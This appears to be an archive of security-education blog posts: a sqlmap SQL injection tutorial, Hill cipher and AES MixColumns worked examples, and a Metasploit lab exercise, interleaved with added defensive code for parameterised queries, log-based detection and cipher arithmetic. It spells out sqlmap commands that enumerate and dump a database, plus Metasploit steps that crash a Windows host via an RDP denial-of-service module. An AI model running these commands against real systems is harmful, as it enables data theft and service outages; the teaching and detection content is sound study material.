Friday, 25 March 2016

Attacking Web Applications: SQL Injection - For Education Purposes Only

Data is one of the most vital components of information systems. Database-powered web applications are used by organizations to collect data from customers. Among web application attacks there are different types, such as buffer overflows, SQL injection, cross-site scripting and distributed denial-of-service (DDoS) attacks.

SQL Injection


SQL is the acronym for Structured Query Language. It is used to retrieve and manipulate data in a database. SQL injection is an attack that poisons dynamically built SQL statements, for example by commenting out part of the statement or by appending a condition that is always true.

Sqlmap 


Sqlmap is one of the most popular and powerful SQL injection automation tools out there. Given a vulnerable HTTP request URL, sqlmap can exploit the remote database and do a lot of hacking, such as extracting database names, tables, columns and all the data in the tables. It can even read and write files on the remote file system under certain conditions. Written in Python, it is one of the most powerful hacking tools out there. Sqlmap is the Metasploit of SQL injection.

Vulnerable Urls

Let's say there is a web application or website that has a URL like this:

http://www.site.com/section.php?id=1

and it is prone to SQL injection because the developer of that site did not properly escape the parameter id. This can be tested simply by trying to open the URL

http://www.site.com/section.php?id=1'

We just added a single quote to the parameter. If this URL throws an error or reacts in an unexpected manner, it is clear that the database received the unexpected single quote, which the application did not escape properly. So in this case the input parameter "id" is vulnerable to SQL injection.
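As an added example that is not part of the original post, here is the lookup behind a URL such as section.php?id=1 written first the vulnerable way the post describes (user input pasted into the SQL text) and then the fixed way (a bound parameter). The table, its rows and the in-memory SQLite database are a constructed sample; the function names are mine. The probe() helper repeats the single-quote test from above: the vulnerable query errors on id=1' and returns every row for an always-true condition, while the parameterised query treats both inputs as an ordinary, invalid id.

```python
# Added example, not code from the original post: the lookup behind a URL such
# as section.php?id=1, first written the vulnerable way the post describes
# (user input pasted into the SQL text) and then the fixed way (a bound
# parameter). The table and rows are a constructed sample in an in-memory
# SQLite database.
import sqlite3


def make_db():
    """Constructed sample data standing in for the site's real table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE section (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO section VALUES (?, ?)",
                     [(1, "Home"), (2, "About"), (3, "Admin only")])
    return conn


def lookup_vulnerable(conn, raw_id):
    """The bug the post describes: the raw id is concatenated into the query,
    so the database parses whatever the user typed, quotes and keywords included."""
    sql = "SELECT id, title FROM section WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, raw_id):
    """The fix: validate the type, then bind the value as a parameter so the
    database never interprets it as SQL."""
    try:
        section_id = int(raw_id)
    except ValueError:
        return []  # not a valid id: reject it (and log it at the edge) rather than guess
    sql = "SELECT id, title FROM section WHERE id = ?"
    return conn.execute(sql, (section_id,)).fetchall()


def probe(lookup, raw_id):
    """Run one lookup the way the post's manual test does and report whether the
    database raised an error ('error', message) or answered ('rows', rows)."""
    conn = make_db()
    try:
        return ("rows", lookup(conn, raw_id))
    except sqlite3.Error as exc:
        return ("error", str(exc))
    finally:
        conn.close()


if __name__ == "__main__":
    for raw in ("1", "1'", "1 OR 1=1"):
        print("id=%-10r vulnerable -> %s" % (raw, probe(lookup_vulnerable, raw)))
        print("id=%-10r safe       -> %s" % (raw, probe(lookup_safe, raw)))
```

The database error on id=1' is exactly the reaction the post tells you to look for, and it is the same signal sqlmap starts from. Hiding the raw error behind a generic error page removes the tell but not the flaw; binding the parameter (and rejecting non-integer ids) removes the flaw.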

Hacking with sqlmap

Now it's time to move on to sqlmap to hack such URLs. The sqlmap command is run from the terminal with the following command:

sqlmap -u http://www.site.com/section.php?id=1

The above is the first and simplest command to run with the sqlmap tool. It checks the input parameters to find out whether they are vulnerable to SQL injection. To do this, sqlmap sends different kinds of SQL injection payloads to the input parameter and checks the output. In the process sqlmap is also able to identify the remote operating system and the database name and version.

So the sqlmap tool has discovered the operating system, web server and database along with version information. Even this much is pretty impressive. But it's time to move on and see what more this tool is capable of.


Discover Databases

Once sqlmap confirms that a remote url is vulnerable to sql injection and is exploitable the next step is to find out the names of the databases that exist on the remote system. The "--dbs" option is used to get the database list.

sqlmap -u http://www.sitemap.com/section.php?id=1 --dbs


Find tables in a particular database

sqlmap -u http://www.site.com/section.php?id=1 --tables -D Databasename


Get columns of a table

sqlmap -u http://www.site.com/section.php?id=1 --columns -D Databasename -T tablename


Get data from a table

sqlmap  -u http://www.site.com/section.php?id=1 --dump -D Databasename -T tablename
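As an added example that is not part of the original post, here is the sqlmap run described above as the web server sees it. Constructed Apache-style access log lines are scanned for the traces such a run leaves behind: the default sqlmap User-Agent, quote, comment and keyword markers inside decoded query parameters, and a burst of different payloads against one parameter from one source. The log format, the marker list, the sample User-Agent string and the burst threshold are assumptions for this example.

```python
# Added example, not code from the original post: the sqlmap steps above seen
# from the web server's side. Constructed Apache-style access log lines are
# scanned for the traces such a run leaves: the default sqlmap User-Agent,
# quote/comment/keyword markers inside query parameters, and a burst of
# different payloads against one parameter from one source. The log format,
# marker list and burst threshold are assumptions for this example.
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Cheap syntactic tells of an injection probe inside a decoded parameter value.
SQLI_MARKERS = re.compile(
    r"('|--|/\*|\bUNION\b|\bSELECT\b|\bSLEEP\s*\(|\b(?:OR|AND)\b\s+\d+=\d+)",
    re.IGNORECASE,
)

# Constructed sample: one ordinary visitor (10.0.0.5) and one sqlmap-style run (10.0.0.9).
SAMPLE_LOG = """\
10.0.0.5 - - [25/Mar/2016:10:00:01 +0000] "GET /section.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [25/Mar/2016:10:00:09 +0000] "GET /section.php?id=2 HTTP/1.1" 200 498 "-" "Mozilla/5.0"
10.0.0.9 - - [25/Mar/2016:10:01:00 +0000] "GET /section.php?id=1%27 HTTP/1.1" 500 233 "-" "Mozilla/5.0"
10.0.0.9 - - [25/Mar/2016:10:01:05 +0000] "GET /section.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
10.0.0.9 - - [25/Mar/2016:10:01:05 +0000] "GET /section.php?id=1%20AND%201%3D2 HTTP/1.1" 200 120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
10.0.0.9 - - [25/Mar/2016:10:01:06 +0000] "GET /section.php?id=1%20UNION%20SELECT%20NULL%2CNULL-- HTTP/1.1" 200 640 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
10.0.0.9 - - [25/Mar/2016:10:01:07 +0000] "GET /section.php?id=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
"""


def parse_line(line):
    """Parse one access log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["path"])
    rec["path"] = url.path
    # parse_qsl percent-decodes once; decoding again would invite double-encoding tricks
    rec["params"] = dict(parse_qsl(url.query, keep_blank_values=True))
    return rec


def analyse(lines, burst_threshold=5):
    """Return (source_ip, reason, evidence) findings for the given log lines."""
    findings = []
    payloads = defaultdict(set)  # (ip, path, param) -> distinct suspicious values
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["ua"].lower().startswith("sqlmap"):
            findings.append((rec["ip"], "sqlmap user-agent", rec["ua"]))
        for name, value in rec["params"].items():
            if SQLI_MARKERS.search(value):
                findings.append((rec["ip"], "sqli marker in parameter '%s'" % name, value))
                payloads[(rec["ip"], rec["path"], name)].add(value)
    for (ip, path, name), values in payloads.items():
        if len(values) >= burst_threshold:
            findings.append((ip, "%d distinct payloads against %s?%s" % (len(values), path, name), ""))
    return findings


if __name__ == "__main__":
    for ip, reason, evidence in analyse(SAMPLE_LOG.splitlines()):
        print(ip, "|", reason, "|", evidence)
```

The User-Agent is the weakest of the three signals, since sqlmap can be told to use a different one (its --random-agent option); the marker hits and the burst of distinct payloads against a single parameter survive that, which is why the example reports all three per source rather than relying on one.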

Friday, 18 March 2016

Hill Cipher Encryption/Decryption

Hill Cipher belongs to the category of block ciphers and polyalphabetic ciphers.

  • In a Hill Cipher, the key is a square matrix of size m x m, where m is the block size.

Encryption:

C.T = (P.T × Key) mod 26

Decryption:

P.T = (C.T × Key^-1) mod 26

Here P.T and C.T are a plaintext block and a ciphertext block of m letters written as row vectors (A = 0, ..., Z = 25). The key matrix in the Hill Cipher must be invertible modulo 26: its determinant needs a multiplicative inverse mod 26, which exists only when the determinant shares no factor with 26.

Example:

Perform encryption/decryption on the given plaintext "Attack is Tonight".
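As an added example that is not part of the original post, here is the Hill cipher carried out in code with the convention used above (C.T = (P.T × Key) mod 26, row-vector blocks). The post's own key matrix and working were in an image that is no longer on the page, so the 3x3 key below is a constructed sample chosen to be invertible modulo 26, with block size m = 3 (an assumption). The inverse key is computed from the determinant and adjugate, and a key with no inverse mod 26 is rejected, which is the condition stated above.

```python
# Added example, not code from the original post: a Hill cipher following the
# post's convention C.T = (P.T x Key) mod 26 with row-vector blocks. The post's
# own key matrix was in an image that did not survive, so the 3x3 key here is a
# constructed sample chosen to be invertible modulo 26 (block size m = 3).
from math import gcd

MOD = 26
KEY = [[6, 24, 1],
       [13, 16, 10],
       [20, 17, 15]]   # constructed sample key; det = 441 = 25 (mod 26), gcd(25, 26) = 1


def _det(m):
    """Integer determinant by cofactor expansion (fine for small key sizes)."""
    n = len(m)
    if n == 1:
        return m[0][0]
    total = 0
    for c in range(n):
        minor = [row[:c] + row[c + 1:] for row in m[1:]]
        total += (-1) ** c * m[0][c] * _det(minor)
    return total


def key_inverse_mod26(key):
    """Return Key^-1 mod 26 via the adjugate; raise if det has no inverse mod 26."""
    n = len(key)
    det = _det(key) % MOD
    if gcd(det, MOD) != 1:
        raise ValueError("key matrix is not invertible modulo 26")
    det_inv = next(x for x in range(1, MOD) if det * x % MOD == 1)
    inv = [[0] * n for _ in range(n)]
    for r in range(n):
        for c in range(n):
            # adjugate entry (r, c) is the cofactor of entry (c, r)
            minor = [row[:r] + row[r + 1:] for i, row in enumerate(key) if i != c]
            inv[r][c] = ((-1) ** (r + c) * _det(minor) * det_inv) % MOD
    return inv


def _blocks(text, m):
    """Letters only, A=0..Z=25, split into blocks of m (padded with X, an assumption)."""
    letters = [ord(ch) - 65 for ch in text.upper() if ch.isalpha()]
    while len(letters) % m:
        letters.append(ord("X") - 65)
    return [letters[i:i + m] for i in range(0, len(letters), m)]


def _row_times_matrix(vec, mat):
    n = len(mat)
    return [sum(vec[j] * mat[j][c] for j in range(n)) % MOD for c in range(n)]


def hill_encrypt(plaintext, key=KEY):
    """C.T = (P.T x Key) mod 26, block by block."""
    m = len(key)
    out = []
    for block in _blocks(plaintext, m):
        out.extend(_row_times_matrix(block, key))
    return "".join(chr(65 + v) for v in out)


def hill_decrypt(ciphertext, key=KEY):
    """P.T = (C.T x Key^-1) mod 26: decryption is encryption with the inverse key."""
    return hill_encrypt(ciphertext, key_inverse_mod26(key))


if __name__ == "__main__":
    ct = hill_encrypt("Attack is Tonight")
    print("ciphertext:", ct)
    print("recovered :", hill_decrypt(ct))
```

Spaces and case are dropped before encryption, so "Attack is Tonight" becomes the fifteen letters ATTACKISTONIGHT, which with m = 3 is exactly five blocks and needs no padding.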
Wednesday, 16 March 2016

AES Mix Column Transformation With Example


The Advanced Encryption Standard (AES) is a symmetric-key block cipher published by NIST in 2001.

To provide security, AES uses four types of transformations:
  1. SubBytes
  2. ShiftRows
  3. MixColumns
  4. AddRoundKey
The MixColumns transformation operates at the column level. The bytes in the state column and in the constant matrix are interpreted as 8-bit words (polynomials of degree at most 7) with coefficients in GF(2).
  • Multiplication of bytes is done in GF(2^8) with the modulus x^8 + x^4 + x^3 + x + 1.
  • Addition is the same as XORing the 8-bit words.
  • In AES a byte is treated as a single entity and is written in hex form.
     Example: the 8 bits 10001100 are written as 8C in hex.




The first output byte for a state column (d4, bf, 5d, 30) comes from the first row (02 03 01 01) of the constant matrix:

[ 02 * d4 ] + [ 03 * bf ] + [ 01 * 5d ] + [ 01 * 30 ]

Convert each hex byte into binary, then convert the binary into its equivalent polynomial.
  • Example: d4 = 11010100 -> x^7 + x^6 + x^4 + x^2

t1 = [ 02 * d4 ]
   = [00000010] * [11010100]
   = x * (x^7 + x^6 + x^4 + x^2)
t1 = x^8 + x^7 + x^5 + x^3

t2 = [ 03 * bf ]
   = [00000011] * [10111111]
   = (x + 1) * (x^7 + x^5 + x^4 + x^3 + x^2 + x + 1)
   = (x^8 + x^6 + x^5 + x^4 + x^3 + x^2 + x) + (x^7 + x^5 + x^4 + x^3 + x^2 + x + 1)
In GF(2) addition is XOR, so pairs of terms with the same degree cancel out.
t2 = x^8 + x^7 + x^6 + 1

t3 = [ 01 * 5d ]
   = [00000001] * [01011101]
   = 1 * (x^6 + x^4 + x^3 + x^2 + 1)
t3 = x^6 + x^4 + x^3 + x^2 + 1

t4 = [ 01 * 30 ]
   = [0000 0001] * [0011 0000]
   = 1 * (x^5 + x^4)
t4 = x^5 + x^4

final ans = t1 + t2 + t3 + t4
          = (x^8 + x^7 + x^5 + x^3) + (x^8 + x^7 + x^6 + 1) + (x^6 + x^4 + x^3 + x^2 + 1) + (x^5 + x^4)
In GF(2) addition is XOR, so pairs of terms with the same degree cancel out. Here the two x^8 terms cancel each other, so no reduction by the modulus x^8 + x^4 + x^3 + x + 1 is needed for this byte.
          = x^2
          = 0000 0100

final ans = 04 (in hex)
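As an added example that is not part of the original post, here is the same GF(2^8) arithmetic in code: multiplication by repeated "times x" steps with reduction by x^8 + x^4 + x^3 + x + 1 (0x11b), addition as XOR, and the full MixColumns matrix applied to the column d4 bf 5d 30 whose first output byte is worked out above. The poly_str helper prints bytes in the polynomial notation the post uses. Function names are mine.

```python
# Added example, not code from the original post: GF(2^8) arithmetic for AES
# MixColumns, reproducing the worked byte above. Multiplication reduces by
# x^8 + x^4 + x^3 + x + 1 (0x11b); addition is XOR. The column d4 bf 5d 30 is
# the input the post's four terms come from.
AES_MODULUS = 0x11B  # x^8 + x^4 + x^3 + x + 1


def xtime(b):
    """Multiply a byte by x (i.e. by 02) in GF(2^8), reducing if bit 8 is set."""
    b <<= 1
    if b & 0x100:
        b ^= AES_MODULUS
    return b & 0xFF


def gf_mul(a, b):
    """Multiply two bytes in GF(2^8) by shift-and-add."""
    result = 0
    while b:
        if b & 1:
            result ^= a  # addition in GF(2) is XOR
        a = xtime(a)
        b >>= 1
    return result


def poly_str(b):
    """Render a byte as the polynomial form used in the post, e.g. d4 -> x^7 + x^6 + x^4 + x^2."""
    terms = []
    for i in range(7, -1, -1):
        if (b >> i) & 1:
            terms.append("x^%d" % i if i > 1 else ("x" if i == 1 else "1"))
    return " + ".join(terms) if terms else "0"


MIX_MATRIX = [[2, 3, 1, 1],
              [1, 2, 3, 1],
              [1, 1, 2, 3],
              [3, 1, 1, 2]]


def mix_column(col):
    """Apply MixColumns to one 4-byte state column."""
    out = []
    for row in MIX_MATRIX:
        acc = 0
        for coef, byte in zip(row, col):
            acc ^= gf_mul(coef, byte)
        out.append(acc)
    return out


if __name__ == "__main__":
    column = [0xD4, 0xBF, 0x5D, 0x30]
    for coef, byte in zip(MIX_MATRIX[0], column):
        product = gf_mul(coef, byte)
        print("%02x * %02x = %02x  (%s)" % (coef, byte, product, poly_str(product)))
    print("mixed column:", " ".join("%02x" % b for b in mix_column(column)))
```

Note one difference from the hand calculation: the code reduces each product as soon as bit 8 appears (02 * d4 becomes b3 rather than the unreduced x^8 + x^7 + x^5 + x^3), whereas the post keeps the unreduced terms and lets the x^8 pairs cancel. Because reduction is linear, the two routes give the same byte, 04.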




Tuesday, 15 March 2016

Parrot Security OS 2.1 Installation Steps in VirtualBox - Hacking OS - Tutorial

Parrot Security OS (or ParrotSec) is a GNU/Linux distribution based on Debian. It was built to perform penetration tests (computer security), vulnerability assessment and mitigation, computer forensics and anonymous surfing. It is developed by the Frozenbox team.

For More Details visit :
https://parrotsec.org/features.fx#specs


OPHCRACK- Hacking Tutorial- Windows XP/7/8/10 Password Crack within 90 Seconds ...!!!!

Ophcrack is a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms.



Practical approach to study Scanning and Enumeration Techniques.

Warning:

The objective of this blog is to learn about finding system vulnerabilities and security issues. Never try any hacking method against any other IP address, website, government website or server, because that is a cybercrime.

For education purposes you can choose your friends' or lab IP addresses.

If anybody uses this blog for malicious purposes, I am not responsible; it will be a cybercrime.



Scanning and Enumeration - Second Step of Ethical Hacking.

After completing the 1st step of ethical hacking, information gathering, we will perform step 2.

Scanning:
Scanning is a common technique used by a penetration tester to find the open doors of a target, that is, its open ports and the services listening on them.

Enumeration:
Enumeration is the first attack on the target network; it is the process of gathering information about a target machine by actively connecting to it.

Q1: Using scanning, which information can be found?

Q2: What is an open port, a null session, reverse_tcp?

Q3: Study the nmap and metasploit software of Kali Linux.

Q4: Understand the following terms:
       1. Vulnerability
       2. Exploit
       3. Payload

Q5: Exercise

Ping the target machine to check whether it is live.

1. Find open ports of the target machine.

   $ nmap -T4 -A -v Targetpcip

   (check whether port 445 is open)

2. Gather operating system information of the target machine.

   Go to --> Terminal
   Type
   $ msfconsole
   msf > use auxiliary/scanner/portscan/syn
   > set RHOSTS targetmachineip
   > set PORTS 445
   > run

   If you succeed, then:

   Note: TCP port 445 is used for SMB over TCP. The SMB (Server Message Block) protocol is used, among other things, for file sharing in Windows.

   Again go to the terminal --> your home dir

   - Find the operating system type and version
   - Windows has more vulnerabilities

   $ msfconsole
   msf > use auxiliary/scanner/smb/smb_version
   > set RHOSTS Targetmachineip
   > run

3. You found the target machine's OS version; now find its vulnerability and perform the attack.

   $ msfconsole
   msf > use auxiliary/dos/windows/rdp/ms12_0_020_maxchannelids
   > show options
   > set RHOST targetip
   > exploit

   Check the target PC (blue screen error).

4. What are the countermeasures for this attack?

5. Demonstrate any two other vulnerabilities of Windows or Linux.
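As an added example that is not part of the original post, and as a starting point for question 4, here is the port scan of step 1 as the target's firewall sees it. The code parses constructed iptables-style kernel log lines and flags any source that touches many distinct TCP ports within a short window, calling out the SMB (445) and RDP (3389) ports this exercise leans on. The log line format, the 60-second window, the 10-port threshold and the sample addresses are all assumptions for this example.

```python
# Added example, not code from the original post, for question 4 above: the
# port scan of step 1 as the target's firewall sees it. It parses constructed
# iptables-style kernel log lines and flags any source that touches many
# distinct TCP ports within a short window, calling out the SMB (445) and
# RDP (3389) ports this exercise leans on. The line format, the 60-second
# window and the 10-port threshold are assumptions for this example.
import re
from collections import defaultdict
from datetime import datetime

IPT_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ kernel: .*?"
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) .*?PROTO=TCP .*?DPT=(?P<dpt>\d+)"
)

SENSITIVE_PORTS = {445: "SMB", 3389: "RDP"}

SCAN_PORTS = [21, 22, 23, 25, 80, 135, 139, 443, 445, 3389, 8080]
# Constructed sample: 10.0.0.9 probes eleven ports in eleven seconds; 10.0.0.5 is a normal client.
SAMPLE_LOG = [
    ("Mar 15 10:00:%02d fw kernel: DROP IN=eth0 OUT= SRC=10.0.0.9 DST=10.0.0.20 "
     "PROTO=TCP SPT=%d DPT=%d SYN") % (i, 40000 + i, port)
    for i, port in enumerate(SCAN_PORTS)
] + [
    "Mar 15 10:00:03 fw kernel: ACCEPT IN=eth0 OUT= SRC=10.0.0.5 DST=10.0.0.20 PROTO=TCP SPT=51000 DPT=445 SYN",
    "Mar 15 10:05:00 fw kernel: ACCEPT IN=eth0 OUT= SRC=10.0.0.5 DST=10.0.0.20 PROTO=TCP SPT=51001 DPT=80 SYN",
]


def parse(line, year=2016):
    """Parse one log line into (timestamp, src, dst, dport), or None if it does not match."""
    m = IPT_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime("%d %s" % (year, m.group("ts")), "%Y %b %d %H:%M:%S")
    return ts, m.group("src"), m.group("dst"), int(m.group("dpt"))


def detect_scans(lines, window_s=60, port_threshold=10):
    """Flag sources that hit at least port_threshold distinct ports within window_s seconds."""
    by_src = defaultdict(list)
    for event in map(parse, lines):
        if event:
            by_src[event[1]].append(event)
    alerts = []
    for src, events in by_src.items():
        events.sort()
        best_end, best_ports = None, set()
        # For each event, look back window_s seconds and count distinct ports touched.
        for j, (t_end, _, _, _) in enumerate(events):
            ports = {e[3] for e in events[:j + 1]
                     if (t_end - e[0]).total_seconds() <= window_s}
            if len(ports) > len(best_ports):
                best_end, best_ports = t_end, ports
        if len(best_ports) >= port_threshold:
            alerts.append({
                "src": src,
                "distinct_ports": len(best_ports),
                "window_end": best_end.strftime("%H:%M:%S"),
                "sensitive": ["%d/%s" % (p, SENSITIVE_PORTS[p])
                              for p in sorted(best_ports) if p in SENSITIVE_PORTS],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_scans(SAMPLE_LOG):
        print(alert)
```

A normal client touches one or two ports on a server; the -A scan above touches dozens in seconds, which is why distinct-port counting per source is one of the simplest scan detections. The "sensitive" list exists so that a scan that reaches SMB or RDP, the two services this exercise goes on to use, is easy to prioritise.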